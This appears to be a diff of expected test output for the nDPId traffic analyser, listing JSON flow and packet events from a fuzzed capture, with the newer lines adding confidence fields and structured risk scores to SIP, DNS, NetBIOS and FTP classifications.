-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469572844,"flow_last_seen":1120469572844,"flow_idle_time":180000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"192.168.1.52","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469595096,"flow_last_seen":1120469595096,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.251","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469590405,"flow_last_seen":1120469590405,"flow_idle_time":180000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":0,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"208.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469572844,"flow_last_seen":1120469572844,"flow_idle_time":180000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"192.168.1.52","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469555830,"flow_last_seen":1120469564839,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469572841,"flow_last_seen":1120469572842,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2714,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469572841,"flow_last_seen":1120469572842,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2714,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469573246,"flow_last_seen":1120469578248,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590256,"flow_last_seen":1120469590256,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635153,"flow_last_seen":1120469635153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2721,"dst_port":58999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635153,"flow_last_seen":1120469635153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2721,"dst_port":58999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00709{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1120469634878,"flow_last_seen":1120469635196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
+00826{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1120469634878,"flow_last_seen":1120469635196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1120469634878,"flow_last_seen":1120469635196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469560833,"flow_last_seen":1120469560833,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2597,"dst_port":29440,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469560833,"flow_last_seen":1120469560833,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2597,"dst_port":29440,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590257,"flow_last_seen":1120469590257,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":9587,"dst_port":156,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590257,"flow_last_seen":1120469590257,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":9587,"dst_port":156,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469680447,"flow_last_seen":1120469680447,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":9587,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00661{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1120469572981,"flow_last_seen":1120469697469,"flow_idle_time":180000,"flow_min_l4_payload_len":346,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":2465,"flow_avg_l4_payload_len":493,"midstream":0,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1120469572981,"flow_last_seen":1120469697469,"flow_idle_time":180000,"flow_min_l4_payload_len":346,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":2465,"flow_avg_l4_payload_len":493,"midstream":0,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00585{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469663172,"flow_last_seen":1120469663172,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.136.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469664171,"flow_last_seen":1120469680185,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00655{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469680186,"flow_last_seen":1120469680186,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2723,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00681{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469680186,"flow_last_seen":1120469680186,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2723,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469681446,"flow_last_seen":1120469689458,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469685452,"flow_last_seen":1120469685452,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.17.1","src_port":2724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00589{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469685131,"flow_last_seen":1120469685131,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":25481,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469633828,"flow_last_seen":1120469634840,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"ts_msec":1120469827458,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00801{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469633828,"flow_last_seen":1120469634840,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"ts_msec":1120469827458,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469632829,"flow_last_seen":1120469632829,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1120469827458,"l3_proto":"ip4","src_ip":"192.114.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00661{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1120469540839,"flow_last_seen":1120469781470,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":750,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469827458,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00656{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469697460,"flow_last_seen":1120469697462,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120469827458,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2725,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00656{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469697468,"flow_last_seen":1120469697468,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469827458,"l3_proto":"ip4","src_ip":"192.168.1.46","dst_ip":"192.168.1.2","src_port":53,"dst_port":2726,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1120469540839,"flow_last_seen":1120469781470,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":750,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469827458,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00682{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469697460,"flow_last_seen":1120469697462,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120469827458,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2725,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00682{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469697468,"flow_last_seen":1120469697468,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469827458,"l3_proto":"ip4","src_ip":"192.168.1.46","dst_ip":"192.168.1.2","src_port":53,"dst_port":2726,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":133,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469828958,"flow_last_seen":1120469828958,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469828958,"l3_proto":"ip4","src_ip":"192.168.1.202","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1120469828958,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120469828958,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOah8AAIARTC7AqAHKwKgB\/wCJAIkAOluchP8BEAABAAAAAAAAIEVGRURFSkZQRUVFUEVOa0JFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469828958,"flow_last_seen":1120469828958,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469828958,"l3_proto":"ip4","src_ip":"192.168.1.202","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469828958,"flow_last_seen":1120469828958,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469828958,"l3_proto":"ip4","src_ip":"192.168.1.202","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00406{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":136,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120469830657,"pkt":"ADBPADRWAODtAW69CABFAI1IaiAAAIARTTHAqAECwKgBAQqsADUANM1AXNgBAAABAAABgAAABF9zaXAEX3VkcANzMnAJY3liZXJjaXR5AmRrAAAhAAE="}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":136,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469831652,"flow_last_seen":1120469831652,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469831652,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2732,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
